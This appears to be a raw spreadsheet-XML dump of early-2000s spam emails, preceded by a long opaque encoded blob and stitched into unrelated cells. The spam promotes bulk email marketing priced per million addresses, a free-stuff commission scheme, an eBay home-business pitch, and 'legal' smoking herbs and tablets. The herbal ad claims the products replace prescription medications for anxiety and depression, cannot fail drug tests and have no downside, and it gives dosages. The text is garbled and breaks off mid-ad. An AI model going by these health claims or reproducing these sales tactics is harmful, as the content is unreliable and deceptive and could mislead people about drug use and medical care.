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
uLf1x</t>
  </si>
  <si>
    <t xml:space="preserve">AFFORDABLE DOMAIN REGISTRATION FOR EVERYONE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(f4)5088VukL9-796qVfq4651flcG5-695tl29
</t>
  </si>
  <si>
    <t xml:space="preserve">FREESTORES - MAKE MONEY GIVING AWAY FREE STUFF!!!
&lt;!--
.txtboxoffer {  font-family: arial; font-size: 12px; font-style: normal; font-weight: bold; color: 6A0002}
.txt {  font-family: arial; font-size: 12px; font-style: normal; font-weight: normal; color: 000000}
.titletxt {  font-family: arial; font-size: 14px; font-style: normal; font-weight: bold; color: F7201E}
.textbott {  font-family: arial; font-size: 16px; font-style: normal; font-weight: bolder; color: #000033}
--&gt;
Make Money With
                                Your Own Free Stuff Website!
Get Your Own Free Stuff
                                Website. With FREEstores.biz, there is no need
                                to learn any programming skills. Your store is
                                automatically set up for you. Of course, you are
                                welcome to customize your store using the tools
                                offered in the Owner's Back Office. Optional customization
                                includes adding your own logo and changing color
                                schemes. You may also add as many as 5 stores
                                to your account at no additional charge!
Access to hundreds of
                                Free products!
FREEstores.biz is always on
                                the lookout for new Free products to add to the
                                warehouse. Every time a new product is located,
                                it is automatically added to your store in the
                                appropriate category. When your customers order
                                products, they are shipped from our warehouse
                                directly to your customers. There is no inventory
                                for you to manage - ever!
Act now
                                and receive
                                a brand-new 1.2 Ghz
                                Gatewayï¿½ Computer
Monthly
                                      Commissions!
You earn $3 for every Free item ordered by your
                                      customers. In your Back Office, you have
                                      access to statistics which will tell you
                                      exactly how many customers you had in your
                                      store each day, how many items were purchased,
                                      and most importantly, how much commission
                                      you earned!TRUE MAKE MONEY WHILE YOU SLEEP BUSINESS!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</si>
  <si>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affordable.E-MAIL MARKETING IS THE ANSWER! How do we know? We know because that's exactly what we do.It's a proven fact that you can attract new business through 
Direct E-mail Marketing. The profits that E-mail advertising generate are amazing!We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works.STANDARD PRICING AND PROCEDURES-----------------------------------------------------------------------EXTRACTING:Our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e-mail.-----------------------------------------------------------------------EVALUATION:  $350.00 (optional)
One of our marketing specialists will evaluate your sales letter, and
offer his/her expertise on how to make it the most successful.-----------------------------------------------------------------------STANDARD PRICING: (Emails Delivered)
1 Million- $700.00 per
2 Million- $600.00 per
3 Million- $500.00 per
4 Million &amp; up - $400.00 per-----------------------------------------------------------------------SPECIAL OFFER!This introductory offer of $300.00 includes:1. Set-Up Fee
2. Evaluation of Sales Letter 
3. 500,000 e-mails delivered-----------------------------------------------------------------------PAYMENT POLICY:
All services must be paid in full prior to delivery of advertisement.
-----------------------------------------------------------------------
NOTICE: 
Absolutely no threatening or questionable materials. If you are serious about Direct &gt;&gt;Email&gt;&gt; Marketing&gt;&gt;--Fax 
the following to (602) 392-8288
----------------------------------------------------------------------PLEASE FILL THIS FORM OUT COMPLETELY!Contact Name: _____________________________________________Business Name:  ______________________________________# Years in Business:  _________________________Business Type:  ______________________________________Address: _________________________________________________City: ____________________  State: ______  Zip: ______________  Country: _______________Email Address: _______________________________________________Phone:  __________________________ Fax:  _______________________
&gt;&gt;&gt;&gt;&gt;-&gt;       &lt;&lt; NO Toll-Free Phone #'s &gt;&gt;
------------------------------------------
To get out from our email database send an email to mailto:publicservice1@btamail.net.cn
</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</si>
  <si>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affordable.E-MAIL MARKETING IS THE ANSWER! How do we know? We know because that's exactly what we do.It's a proven fact that you can attract new business through 
Direct E-mail Marketing. The profits that E-mail advertising generate are amazing!We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works.STANDARD PRICING AND PROCEDURES-----------------------------------------------------------------------EXTRACTING:Our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e-mail.-----------------------------------------------------------------------EVALUATION:  $350.00 (optional)
One of our marketing specialists will evaluate your sales letter, and
offer his/her expertise on how to make it the most successful.-----------------------------------------------------------------------STANDARD PRICING: (Emails Delivered)
1 Million- $700.00 per
2 Million- $600.00 per
3 Million- $500.00 per
4 Million &amp; up - $400.00 per-----------------------------------------------------------------------SPECIAL OFFER!This introductory offer of $300.00 includes:1. Set-Up Fee
2. Evaluation of Sales Letter 
3. 500,000 e-mails delivered-----------------------------------------------------------------------PAYMENT POLICY:
All services must be paid in full prior to delivery of advertisement.
-----------------------------------------------------------------------
NOTICE: 
Absolutely no threatening or questionable materials. If you are serious about Direct &gt;&gt;Email&gt;&gt; Marketing&gt;&gt;--Fax 
the following to (602) 392-8288
----------------------------------------------------------------------PLEASE FILL THIS FORM OUT COMPLETELY!Contact Name: _____________________________________________Business Name:  ______________________________________# Years in Business:  _________________________Business Type:  ______________________________________Address: _________________________________________________City: ____________________  State: ______  Zip: ______________  Country: _______________Email Address: _______________________________________________Phone:  __________________________ Fax:  _______________________
&gt;&gt;&gt;&gt;&gt;-&gt;       &lt;&lt; NO Toll-Free Phone #'s &gt;&gt;
------------------------------------------
To get out from our email database send an email to publicservice1@btamail.net.cn
</t>
  </si>
  <si>
    <t xml:space="preserve">Answer-Us
Â Unlist Information 		This message is brought to you by Answer-us.com in 
		compliance with current federal laws. To find out more about Answer-us.com visit
http://www.answer-us.com. 
        You are receiving this mailing because you or someone you know has 
        registered this email address to receive special offers from an Answer-us.com 
        marketing partner. Screening of addresses has been done to the best of 
        our knowledge. We honor all unlist requests within 72 hours. If you
        have received this email in error, we apologize for any inconvenience it 
        has caused and will not mail further offers to you. To be
        unlisted from our database, please do the 
        following: Simply  click here        . If you have your mail forwarded to a new email address 
        please provide your old email address.
                Â 
Answer-Us
Nationwidesupport@answer-us.com
Â Â 
Our 
        E-Mail Campaigns Have Produced
      Staggering Response Rates!Responsive 
      General or Targeted Managed E-Mail Lists
      Visit
        www.answer-us.com
today!
Copyright 
        ï¿½ 2002 Answer-us.com. All rights reserved. Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">"eBay - #1 Rated Work At Home Business 
        Opportunity"
        - PC Magazine
Fortunes are literally being made in 
        this great new marketplace!
Over $9 Billion 
        in merchandise was sold on eBay in 2001 by people just like you 
        - right from their homes.
Now you too can learn the secrets of successful 
        selling on eBay and make a staggering income from the 
        comfort of your own home. If you are motivated, capable 
        of having an open mind,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Â 
Â  
Â 
Â  
</t>
  </si>
  <si>
    <t>UNCOMMON EXOTIC PLEASURE BOTANICALS!Feeling marvelous, Mood-Sensitive, Mood-Enhancing, Depressive/Regressive, "Sweet Treat" forumulations for the Pleasuring and Well-Being of Body, Mind &amp; Spirit from the planet's foremost "Sensitive" ethnobotanical cooperative -- Exotic Botanical Resources! (Product descriptions, pricing and deep-discounted Intro Offers information below.)SEVENTH HEAVEN "SWEET TREAT" MENU 1. SHANGRILA ZOWIE WOWIE (tm) (Gnarly Sweet Grass).  Absolutely, the most significant legal "Personal Choice" non-cannabis, non-marijuana, non-tobacco smoking botanical on the planet.2. PROSAKA (tm) High-Ratio extracts in tablet form for Calm, Balance, Serenity &amp; Peaceful living.3. AQUEOUS KATHMANDU (tm) (Happy Drops) "Personal Choice" enhanced "Sensitivity" for non-smokers &amp; tokers.4. SWEET VJESTIKA (tm) (Aphrodisia Drops) Erotica; Intimacy "Sensitivity" Enhancement at its finest for men &amp; woman.5. GENTLE FEROCITY (tm) Viripotent Energization, Appetite Suppression Tablets without the inclusion of  Caffeine or MaHaung Herb or Ephedrine!6. CAPILLARIS HERBA (tm) A sedate smoking and/or brewing Happiness  Botanical. ********************************
**Shangrila Zowie Wowie (tm)**
********************************"Personal Choice" Primo Exotic Supplemental Smoking Botanical / Gnarly "SweetGrass" Variety / Supplemental Agenda "Seventh Heaven" Paradoxical Configuration for the "significant" Enhancement and Pleasuring of body, mind &amp; spirit "sensitivities" -- Potentiated; Gnarly, whole-plant Matrix  -- Paragonic Reserve; Enigmatic Blendage Mood "Sensitive / Responsive" Smoking / Brewing Herba.Actions &amp; indications: Simultaneous, High-Spirited; "Stimulation / Relaxation / Aphrodisia" (Significant Paradise Consequence!)This is the Personal Choice, Sensitive, Responsive Smoking ("Smoka") product we have wanting to offer! This is the product and the VALUE that you have been searching for. This is the product that you will buy again &amp; again!We have been in the business (science) of developing non-cannabis, personal choice sensitive smoking agendas for a good, goodly while. Along this avenue of ethnobotany, we have always strived to achieve greater and greater "Sensitivity / Responsiveness" &amp; Aphrodisia within our gourmet smokables and brews. And indeed, we have. Many of these previous products are still marketed today by companies who are less developmental than our botanical resource cooperative. Even our own two signature "smokables" (Ragga Dagga &amp;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propagate for several years before initial harvest can even be undertaken. This is how the botanical achieves "potent significance" much like the regimen of ginseng. Also, harvest time is limited and can take place only twice a year, as like the hemp plant, maximum potency is only achieved after "flowering" occurs. But, unlike the hemp plant, and for that matter, unlike most herbs, the entire base plant of Shangrila Zowie Wowie (leave, stem &amp; root) is all "viripotent," which makes this "gnarly stoke" a botanical phenomenon! As well, most potentiating factors of Shangrila, as well as the primary botanical factor of Shangrila, will not achieve "viripotency" if grown in our hemisphere, therefore; Shangrila is indeed a multi-national, multi-complicated, agricultural undertaking. However, all of this undertaking has indeed been worthwhile! Secondly, the potentiating, infusion regimen used to enhance the attributes of Shangrila has also taken a lon!
g time to bring into potent fruition as there are many balancings of the various molecular factors involved in the completion of Zowie Wowie. We are most pleased to be able to say, as you will note in the experience of Shangrila Zowie Wowie, that this process has achieved fruition.Suffice to say, without any hype or glype, Shangrila Zowie Wowie Gnarly SweetGrass is without a doubt, the most significant, non-invasive, non-cannabis, "sensitive/responsive", personal choice, absolutely legal (cannot fail a drug test), smoking ("Smoka") botanical on our planet ... probably in the universe! Hard to believe that this product is ABSOLUTELY LEGAL!* Mill-stoned &amp; honed.
* Depressive regressive!
* Psychologically uplifting!
* Good-bye stress, anxiety &amp; restlessness!
* Sophisticated, well-balanced "ambiance."
* Inspires contemplativeness and creativity.
* "Potentiated" &amp; viripotent!
* 4 â€“ 5 draws lasts a good, goodly while.
* Sweet aphrodisia! (Horny Goat Weed factoring)
* Simultaneously; uplifting and relaxing!
* Easy ignition, Smooth draw, Sweet, heady taste.
* Easy on, easy off!
* SATISFACTION GUARANTEED!
* No "munchie" factor.
* No failed drug tests!Shangrila Zowie Wowie (tm) Gnarly "SweetGrass" botanical is best utilized as a viri-potent "Smoka", via an herb-pipe. As is an herbalist's way, four or five draws of "Smoka" should be inhaled and retained. For the non-smoker, it is most appropriate to engage this herbaceousness as a potentiated tea/brew. (Steep approximately one teaspoon of Shangrila Zowie Wowie (tm) herba per one cup of water for ten minutes or so &amp; strain.) When smoking Shangrila Zowie Wowie (tm), please draw gently as it is a most preeminent "Sensitive / Responsive" Smoke. Both a personal water-pipe (huuka) (water-pipe is included with quarter pound can only) and a standard herb-pipe are included for your smoking convenience and delight. Smoke and Brew concurrently is absolutely a Sweet, Sensitive Treat!Shangrila Zowie Wowie (tm) "Sensitive/Responsive" Smoka includes and is potentiated with the following non-irradiated, Mill-Stoned &amp; Honed, exotica botanicals and botanical essences: Half-edged Lily-rare Bian Lian (lobeline factors), Kona Lactuca virosa, Yucatan Turnera aphrodisaca, Hawaiian Vervain (Maui strain), Siberian Leonorus Sibricus, rare Lotus Leaf, Jamaican Blue Verbena officinalis, Spanish Peumus Crocus Sativa, Chinese (flowering-tops only) Horny Goat Weed, Ginko Biloba, African Cola Vera, and African Wilde Dagga (flowering-tops only). Shangrila Zowie Wowie (tm) does not include any tobacco or any cannabis factors. Shangrila Zowie Wowie (tm) does indeed achieve gourmet distinction upon its own merit.Shangrila Zowie Wowie (tm) is not intended for use during work or while driving. Nor should it be enjoyed during pregnancy. In addition, although no factor in Shangrila Zowie Wowie (tm) is illegal or regulated, it is the ethical policy of Exotic Botanical Resources that Shangrila Zowie Wowie (tm) not be sold or offered to any person that has not attained at least 21 years of age.  All things in their time.... ********************************************************
SHANGRILA ZOWIE WOWIE PRICING:* One 1 oz. bag (incl. herb-pipe only) $80.00 (plus shipping)
* One 4 oz. Q.P.C. (Quarter Pound Can) (incl. herb-pipe &amp; 
personal brass hookah)  $150.00 (plus shipping) 
Also included as an added BONUS with each Q.P.C. purchase is a FREE 2 oz. package of our Capillaris Herba.(See Intro Offers at bottom of this text for further savings)******************
**PROSAKA (tm)**
******************High-Ratio extracts in tablet form for Calm, Balance, Serenity &amp; Peaceful living.This Prosaka formulation, which we have just recently further potentiated, boasts an extremely loyal and abundant patronage, having been available to market at large now for a number of years. Prosaka botanical tablets were originally introduced as a botanical, supplemental alternative to various traditional medications that are prescribed for stress, anxiety, depressiveness, mood enhancement, insomnia, excessive dream activity, etc. We like to use this analogy: Imagine the circumstances of your life to be hurricane-ish. Certainly, Prosaka will not stop the wind from blowing. However, it will help to center you within the calm eye of your hurricane, so that you will better see your living and make your decisions from a calmer, more serene, more balanced perspective. Please note that when undertaking any supplemental herbal regimen in this arena, it is important to make a personal commitment to the therapy. It would make no sense to purchase Prosaka and to take it only sporadic!
ally or only briefly. It is for this reason, although Prosaka is a very expensive formulation to produce; that we offer 300 count containers at as much of a reduced price as we are able to offer.Prosaka is an exclusive, proprietary amalgamation in tablet form which includes the following uncommon botanicals, extracts, flower-top essences and essential oils: Radix Salviae, Sensitive Mimosa Bark, Arillus Euphoriae, Shizandra, Frutcus Mori, Caulis Polygoni, Zizyohus, Tang Kuei, Cedar Seed, Sweetflag Rhizome, Cuscutae, Amber, Radix Scutellariae, Evodia, Longan, Arisaema, Cistanches, Radix Polygalae, Red Sage Root and Eucommia. No factor contained within Prosaka is restricted or regulated by law. All botanicals contained within are non-irradiated and are of pharmaceutical grade. Suggested Usage: 1 - 2 tablets; 2 to 3 times per day as needed. Best taken on an empty stomach. (During times of intensity up to 10 tablets per day may be utilized.) Also Note: Prosaka is not intended to supercede physician's care nor is it intended for use during pregnancy.********************************************************
PROSAKA PRICING:* One 100 count bag ... $55.00 plus shipping
* One 300 count container ... $130.00 plus shipping
For larger quantities, please inquire.(See Intro Offers at bottom of this text for further savings!)*******************************************
**AQUEOUS KATHMANDU (tm) (Happy Drops)**
*******************************************"Personal Choice" enhanced "Sensitivity" for non-smokers &amp; tokers.Aqueous Kathmandu has only been offered to market at large for a short while. However, in a short time this product has achieved a tremendous, very happy following.Aqueous Kathmandu (tm) "Sensitive/Responsive" Happiness Drops(Temple "Quantum" Variety). Indeed; a Happiness Brew from the Kathmandu a.k.a. "Secret Fire" from a toke-smoke point of view, if you know what I mean and be groovin' the scene. Who du the Kathmandu? Now, everybody can du the Kathmandu!  (that is, if you're 21 years of age or older) Aqueous Kathmandu is engaged to holistically inspire and instill "sensitive/responsive" happiness and mellowness without the detriment of carcinogenic inhalation (smoking). Aqueous Kathmandu is absolutely legal and does not contain any controlled, considered to be harmful or regulated herbs or cannabis/marijuana factors!As "smoking" has become so socially taboo over the years and as so many people have asked us for a liquid product, we have long strived to bring a quantum-factored, concentrated liquid product to fruition. This has been no easy task for a variety of botanical and technological reasons. Finally, we are able to say that this task has been accomplished. A "Sensitive" herbal/botanical awakening, if you will, as we have introduced and brought to market Aqueous Kathmandu (tm) Happiness Drops, Temple "Quantum" Variety, a.k.a. "Secret Fire."- NO need to smoke.  NO carcinogenic factors!
- Absolutely Legal!  NO Prescription Required.
- NO Failed Drug Tests!
- NO Cannabis or any Tobacco variety.
- Quantum-Ratio, Core-Extracted, Refined Organic Factors.
- Marvelously Potent - REMARKABLY Substantial! 
- Inspires Contemplativeness and Creativity!
- Attitude and Mood Enhancement, Adjustment.
- Interrupts Anxiety, Relaxes Stress.
- A much superior product Better than Kava Kava, St. John's Wort, etc.
- Many fine ganja virtues with NONE of the Negatives!
- Better sleeping and dreaming.
- Non-invasive - NO Downside!
- Promotes Body, Mind and Spirit Intimacy.Contents: Aqueous Kathmandu is a unique botanical substantiality.  It is offered and marketed as such.  Undisputedly, it achieves "distinctive accolade" of its own merit.  Aqueous Kathmandu is absolutely legal and does not contain any controlled or regulated or harmful herbs or cannabis factors.  However, it is our mandatory ethical policy that Aqueous Kathmandu not be offered to individuals who have not yet attained at least 21 years of age (all things in their time).  Please note as well that Aqueous Kathmandu is not intended for usage during work or while driving.  And, as is true of all substance and indulgence, this product should not be enjoyed during pregnancy.  This proprietary formulation does include the following quantum-ratio, core-extracted/refined botanicals in an alcohol base as a preservative: Albizzia flower-tops, Drachsha, Chavana Prash, Lactuca Virosa, Hybrid Flowering Turnera Diffusa, Wild Dagga, Capillaris Herba, Angelica Root, Zizyphi Spinosae, Buplerum, !
Hybrid Valeriana officinalis Root, Albizzia flower-tops, mature Polygonum Vine, Calea Zacatechichi, Crocus Sativa flower-tops, Leonorus Sibricus buds, Cinnabaris, Margarita herba, Biotae Orientalis, Salviae Miltiorrhizae.Usage Instructions: Shake well. Mix 30-50 drops with juice or water (best on empty stomach). Ambiance lasts about two hours or so. Not intended for use during pregnancy or while working or driving. Keep out of reach of children.********************************************************
AQUEOUS KATHMANDU PRICING:* One 2 oz. bottle (90+ usages)... $115.00 plus shipping
* Two 2 oz. bottles ... $170.00 plus shipping(See Intro Offers at bottom of this text for further savings!)********************************************
**SWEET VJESTIKA (tm) (Aphrodisia Drops)**
